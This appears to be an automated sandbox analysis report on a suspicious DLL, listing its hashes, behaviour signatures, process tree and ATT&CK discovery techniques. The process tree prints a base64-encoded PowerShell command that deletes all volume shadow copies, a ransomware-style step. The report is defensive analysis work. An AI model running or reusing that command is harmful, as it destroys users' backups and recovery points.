Analysis

  • max time kernel
    122s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:14

General

  • Target

    b6efb55d76540fd01ab1b007f7c8ac5d9c4818aeebd1209e40b5ac2135dcf2f8.dll

  • Size

    166KB

  • MD5

    572c56dbb7d40850ddceda6bca358ae7

  • SHA1

    6752e13f4772d21ee9f85a4d528a5d967ae9ebc9

  • SHA256

    b6efb55d76540fd01ab1b007f7c8ac5d9c4818aeebd1209e40b5ac2135dcf2f8

  • SHA512

    2d4321096585e023c8d26cc7739ab76f0efa06732885d34425fe5ff3a575a0fd255d73a83f4cff3576fe6fc54a55831075e5bf949a9d21e1032fdc38d1b54297

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\b6efb55d76540fd01ab1b007f7c8ac5d9c4818aeebd1209e40b5ac2135dcf2f8.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:820
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\b6efb55d76540fd01ab1b007f7c8ac5d9c4818aeebd1209e40b5ac2135dcf2f8.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:776
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:716
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:756

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/716-56-0x000007FEFB531000-0x000007FEFB533000-memory.dmp
    Filesize

    8KB

  • memory/716-58-0x0000000002950000-0x0000000002952000-memory.dmp
    Filesize

    8KB

  • memory/716-59-0x0000000002952000-0x0000000002954000-memory.dmp
    Filesize

    8KB

  • memory/716-60-0x0000000002954000-0x0000000002957000-memory.dmp
    Filesize

    12KB

  • memory/716-57-0x000007FEF2920000-0x000007FEF347D000-memory.dmp
    Filesize

    11.4MB

  • memory/716-61-0x000000000295B000-0x000000000297A000-memory.dmp
    Filesize

    124KB

  • memory/776-55-0x0000000075191000-0x0000000075193000-memory.dmp
    Filesize

    8KB